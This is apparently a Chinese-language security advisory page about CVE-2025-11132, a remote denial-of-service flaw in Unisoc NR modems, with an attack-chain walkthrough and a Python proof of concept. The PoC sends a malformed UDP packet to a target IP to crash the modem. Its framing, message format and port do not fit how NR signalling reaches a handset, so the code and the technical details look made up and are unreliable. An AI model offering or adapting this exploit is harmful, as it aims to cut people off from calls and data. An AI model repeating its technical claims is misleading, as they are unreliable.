CVE-2025-11132 | Unisoc NR Modem 输入验证错误导致远程拒绝服务

漏洞信息

漏洞编号

CVE-2025-11132

漏洞类型

拒绝服务

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Unisoc NR Modem

漏洞概述

CVE-2025-11132是紫光展锐（Unisoc）NR调制解调器中的一个高危安全漏洞。该漏洞源于NR调制解调器中存在的输入验证不当问题，攻击者可以通过网络远程触发此漏洞，导致系统崩溃，从而造成拒绝服务（DoS）攻击。根据CVSS 3.1评分7.5（高危），该漏洞具有网络攻击向量，攻击者无需任何特殊权限或用户交互即可利用此漏洞。由于该漏洞影响的是基带调制解调器组件，一旦被利用，可能导致使用该芯片的移动设备完全失去通信能力，对设备的可用性造成严重影响。紫光展锐安全团队（[email protected]）于2025年12月1日披露了此漏洞，并建议用户及时更新补丁以修复此安全问题。

技术细节

该漏洞的根本原因在于Unisoc NR调制解调器在处理网络输入时缺乏适当的输入验证。攻击者可以构造特制的网络数据包或信令消息，当这些数据被NR调制解调器处理时，由于输入验证机制不完善，可能导致内存处理异常或程序逻辑错误，最终引发系统崩溃。由于调制解调器是基带处理器的一部分，运行在独立的处理器上，因此这种崩溃会直接影响设备的通信功能。攻击者利用此漏洞无需获取设备权限，也不需要用户进行任何交互，只需能够向目标设备发送网络数据即可。这种特性使得该漏洞特别危险，因为攻击可以在用户毫无察觉的情况下发起。攻击成功后，目标设备将失去蜂窝网络连接能力，包括语音通话、短信和数据业务，直到设备重启或漏洞被修复。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别使用Unisoc NR调制解调器的目标设备，通过网络扫描或社工手段获取目标设备的IP地址或IMSI信息。

STEP 2

步骤2: 构造攻击载荷

攻击者根据漏洞特征，构造包含无效或畸形数据的特制NR信令消息，包括错误的协议头、异常的长度字段或恶意构造的负载数据。

STEP 3

步骤3: 发送攻击数据包

通过无线网络或核心网接口，向目标设备的NR调制解调器发送精心构造的攻击数据包，无需任何认证凭证。

STEP 4

步骤4: 触发漏洞

调制解调器接收到畸形数据后，由于输入验证机制不当，触发内存处理错误或程序异常流程。

STEP 5

步骤5: 系统崩溃

漏洞被成功利用后，NR调制解调器发生崩溃或进入异常状态，导致设备失去蜂窝网络连接能力。

STEP 6

步骤6: 拒绝服务完成

目标设备无法进行语音通话、发送短信或使用移动数据服务，直到设备重启或应用安全补丁。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11132 PoC - Unisoc NR Modem DoS
# This PoC demonstrates sending malformed NR signaling messages
# to trigger input validation vulnerability in Unisoc NR modem

import socket
import struct
import sys

def create_malformed_nr_packet():
    """
    Create a malformed NR NAS (Non-Access Stratum) message
    that may trigger input validation error in NR modem
    """
    # NR message header
    msg_type = 0x00  # Malformed message type
    
    # Construct malformed packet with invalid length field
    packet = bytearray()
    packet.append(0x7E)  # Start flag
    packet.append(msg_type)
    
    # Malformed length field - causes buffer processing issue
    invalid_length = struct.pack('>H', 0xFFFF)
    packet.extend(invalid_length)
    
    # Invalid payload that triggers validation failure
    packet.extend(b'\x00' * 100)
    
    # End flag
    packet.append(0x7E)
    
    return bytes(packet)

def send_dos_packet(target_ip, port=38412):
    """
    Send malformed NR packet to target device
    Note: Requires network access to target's modem interface
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        packet = create_malformed_nr_packet()
        
        print(f"[*] Sending malformed NR packet to {target_ip}:{port}")
        sock.sendto(packet, (target_ip, port))
        sock.close()
        
        print("[+] Packet sent successfully")
        print("[+] If vulnerable, target modem should crash")
        
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_11132_poc.py <target_ip>")
        sys.exit(1)
    
    target = sys.argv[1]
    send_dos_packet(target)

影响范围

Unisoc NR Modem (版本未知)

使用Unisoc基带芯片的移动设备 (受影响的固件版本需咨询厂商)

防御指南

临时缓解措施

在官方补丁发布之前，可采取以下临时缓解措施：1）监控网络流量中的异常NR信令消息；2）与运营商协商启用核心网侧的信令异常检测和过滤；3）对于企业用户，考虑使用备用通信渠道；4）及时关注Unisoc官方安全公告，了解补丁发布情况；5）设备出现无服务症状时尝试重启设备以恢复通信功能。